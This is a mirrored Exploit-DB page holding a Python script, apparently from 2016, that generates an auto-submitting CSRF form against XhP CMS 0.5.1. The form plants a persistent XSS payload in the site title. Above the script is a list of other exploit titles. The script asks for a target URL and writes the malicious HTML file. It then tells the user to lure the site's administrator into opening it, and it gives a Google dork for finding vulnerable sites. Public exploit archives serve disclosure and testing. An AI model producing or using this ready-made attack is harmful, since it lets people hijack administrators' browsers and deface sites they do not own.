bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/40576.py
Offensive Security 77b46b2163 DB: 2016-10-20 
13 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow (PoC)
PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow

PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit
PHP FFI Extension 5.0.5 - Local Safe_mode Bypass

PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)
PHP 5.2.0 (Windows x86) - (PHP_iisfunc.dll) Local Buffer Overflow

Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit
Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop

Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)
Apple QuickTime < 7.2 - SMIL Remote Integer Overflow

Mercury/32 4.52 IMAPD - SEARCH command Authenticated Overflow
Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow

Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow (PoC)
Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow

Integramod nederland 1.4.2 - Remote File Inclusion
Integramod Nederland 1.4.2 - Remote File Inclusion

CNDSOFT 2.3 - Cross-Site Request Forgery / Arbitrary File Upload

NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation
NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation

NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation
NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation

The Unarchiver 3.11.1 - '.tar.Z' Crash PoC
XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation
Intel(R) Management Engine Components 8.0.1.1399 - Unquoted Service Path Privilege Escalation
Lenovo RapidBoot HDD Accelerator 1.00.0802 - Unquoted Service Path Privilege Escalation
Lenovo Slim USB Keyboard 1.09 - Unquoted Service Path Privilege Escalation
Vembu StoreGrid 4.0 - Unquoted Service Path Privilege Escalation
Lenovo ThinkVantage Communications Utility 3.0.42.0 - Unquoted Service Path Privilege Escalation
Intel(R) PROSet/Wireless for Bluetooth(R) + High Speed 15.1.0.0096 - Unquoted Service Path Privilege Escalation
Intel(R) PROSet/Wireless WiFi Software 15.01.1000.0927 - Unquoted Service Path Privilege Escalation
PDF Complete 4.1.12 Corporate Edition - Unquoted Service Path Privilege Escalation
Realtek High Definition Audio Driver 6.0.1.6730 - Unquoted Service Path Privilege Escalation
2016-10-20 05:01:17 +00:00

73 lines
No EOL
3 KiB
Python
Executable file
Raw Blame History

# Exploit Title: XhP CMS 0.5.1 - Cross-Site Request Forgery to Persistent Cross-Site Scripting
# Exploit Author: Ahsan Tahir
# Date: 19-10-2016
# Software Link: https://sourceforge.net/projects/xhp/
# Vendor: https://sourceforge.net/projects/xhp/
# Google Dork: inurl:Powered by XHP CMS
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsan-tahir.com
# Category: webapps
# Version: 0.5.1
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
import os
import urllib
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-=-=-=+
| __ ___ ____ ____ __ __ ____ |
| \ \/ / |__ | _ \ / ___| \/ / ___| |
| \ /| '_ \| |_) | | | | |\/| \___ \ |
| / \| | | | __/ | |___| | | |___) | |
| /_/\_\_| |_|_| \____|_| |_|____/ |
| > XhP CMS 0.5.1 - CSRF to Persistent XSS |
| > Exploit Author & Script Coder: Ahsan Tahir|
+=====-----=====-----======-----=====---==-=-=+
'''
def xhpcsrf():
print banner
url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))
csrfhtmlcode = '''
<html>
<!-- CSRF PoC -->
<body>
<form action="http://%s/action.php?module=users&action=process_general_config&box_id=29&page_id=0&basename=index.php&closewindow=&from_page=page=0&box_id=29&action=display_site_settings&errcode=0" method="POST" enctype="multipart/form-data" name="exploit">
<input type="hidden" name="frmPageTitle" value=""accesskey&#61;z&#32;onclick&#61;"alert&#40;document&#46;domain&#41;" />
<input type="hidden" name="frmPageUrl" value="http&#58;&#47;&#47;localhost&#47;xhp&#47;" />
<input type="hidden" name="frmPageDescription" value="&#13;" />
<input type="hidden" name="frmLanguage" value="english" />
<input type="submit" value="Submit request" />
</form>
<script type="text/javascript" language="JavaScript">
//submit form
document.exploit.submit();
</script>
</body>
</html>
''' % url
print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
extension = ".html"
name = raw_input(" Filename: ")
filename = name+extension
file = open(filename, "w")
file.write(csrfhtmlcode)
file.close()
print(" [+] Your exploit is saved as %s")%filename
print(" [+] Further Details:\n [!] The code saved in %s will automatically submit without\n any user interaction\n [!] To fully exploit, send the admin of this site a webpage with\n the above code injected in it, when he/she will open it the\n title of their website will be\n changed to an XSS payload, and then\n go to %s and hit ALT+SHIFT+Z on your keyboard, boom! XSS will pop-up!") %(filename, url)
print("")
xhpcsrf()
Reference in a new issue View git blame Copy permalink